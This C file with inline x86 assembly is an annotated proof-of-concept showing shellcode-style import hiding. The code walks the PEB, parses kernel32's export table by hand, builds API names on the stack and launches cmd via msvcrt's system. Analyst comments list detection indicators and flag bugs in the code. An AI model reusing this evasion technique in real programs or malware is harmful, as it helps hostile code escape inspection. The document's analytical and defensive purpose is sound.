/*
 * Proof-of-concept in 32-bit x86 MSVC inline assembly (Intel operand order).
 * It shows how code can resolve Windows APIs at run time without going
 * through the executable's import table. Steps, as written below:
 *   1. Read the PEB pointer from fs:[30h], follow PEB->Ldr and the module
 *      list at Ldr+1Ch to get a module base (the author treats it as
 *      kernel32.dll).
 *   2. Walk that module's PE export directory by hand, looking for a name
 *      whose first eight bytes are "GetProcA".
 *   3. Call the resolved function to look up LoadLibraryA and ExitProcess;
 *      the name strings are built on the stack with push immediates.
 *   4. Load "msvcrt", look up system, call system("cmd"), then call
 *      ExitProcess(0).
 *
 * Analyst notes: the API names are assembled on the stack and resolved by
 * hand, so they do not show up in the import table or as contiguous
 * strings. What remains visible is the fs:[30h] read followed by the
 * export-directory offsets (3Ch, 78h, 18h/1Ch/20h/24h), the runs of
 * push imm32 carrying ASCII bytes, and at run time a command shell started
 * as a child of this process.
 */
int main()
{
__asm
{
; Scratch frame: ebp is set to the bottom of a 0x40-byte area, so
; [ebp+40h] is the slot holding the ebp pushed on the first line.
push ebp
sub esp, 0x40
mov ebp, esp
mov eax, fs:0x30 ;PEB
mov eax, [eax + 0x0C] ;Ldr
mov esi, [eax + 0x1C] ;Flink
; lodsd: eax = [esi], i.e. the next entry in the list
lodsd
; Module base taken from the second list entry. Nothing below verifies
; which module this is; it depends on the loader's list order.
mov edi, [eax + 0x08] ;edi = base address of kernel32.dll (author's assumption)
mov eax, [edi + 3Ch] ;eax = offset of the PE header
mov edx, [edi + eax + 78h]
add edx, edi ;edx = address of the export directory
mov ecx, [edx + 18h] ;ecx = number of exported names
mov ebx, [edx + 20h]
add ebx, edi ;ebx = address of the name-pointer table, AddressOfNames
; Scan the name table from the last entry downwards, comparing the first
; eight bytes of each name. There is no lower bound on ecx, so a module
; without a matching export is not handled.
search:
dec ecx
mov esi, [ebx + ecx * 4]
add esi, edi
mov eax, 'PteG' ;bytes "GetP" in memory order
cmp [esi], eax
jne search
mov eax, 'Acor' ;bytes "rocA" in memory order
cmp [esi + 4], eax
jne search
mov ebx, [edx + 24h]
add ebx, edi ;ebx = address of the ordinal table, AddressOfNameOrdinals
mov cx, [ebx + ecx * 2] ;cx = ordinal index for the matched name (only the low 16 bits of ecx are written)
mov ebx, [edx + 1ch]
add ebx, edi ;ebx = start of the function address table, AddressOfFunctions
mov eax, [ebx + ecx * 4]
add eax, edi ;eax = address of GetProcAddress, computed from the index
mov [ebp + 40h], eax ;store the GetProcAddress address at ebp+40h
; Build "LoadLibraryA" on the stack, terminator first, then call
; GetProcAddress(edi, esp).
push 0 ;LoadLibraryA
push dword ptr 'Ayra'
push dword ptr 'rbiL'
push dword ptr 'daoL'
push esp
push edi
call [ebp + 40h]
; ebp+44h is one dword above the slot used for GetProcAddress, outside
; the 0x40 bytes reserved by sub esp.
mov [ebp + 44h], eax
; The top byte of 'sse' is zero and serves as the string terminator.
push dword ptr 'sse' ;ExitProcess
push dword ptr 'corP'
push dword ptr 'tixE'
push esp
push edi
call [ebp + 40h]
mov [ebp + 12h], eax ;ExitProcess address; the offset is not dword-aligned
push dword ptr 'tr' ;LoadLibraryA("msvcrt")
push dword ptr 'cvsm'
push esp
call [ebp + 44h]
mov edi, eax ;edi = handle returned for msvcrt; not checked for failure
push dword ptr 'me' ;look up the address of system
push dword ptr 'tsys'
push esp
push edi
call [ebp + 40h]
mov [ebp + 4], eax
push dword ptr 'dmc' ;system("cmd")
push esp
call [ebp + 4]
; ExitProcess(0): the pushed strings and the scratch frame are never
; unwound.
push 0
mov eax, [ebp + 12h]
call eax
}
/* Presumably not reached, since the asm block ends by calling ExitProcess. */
return 0;
}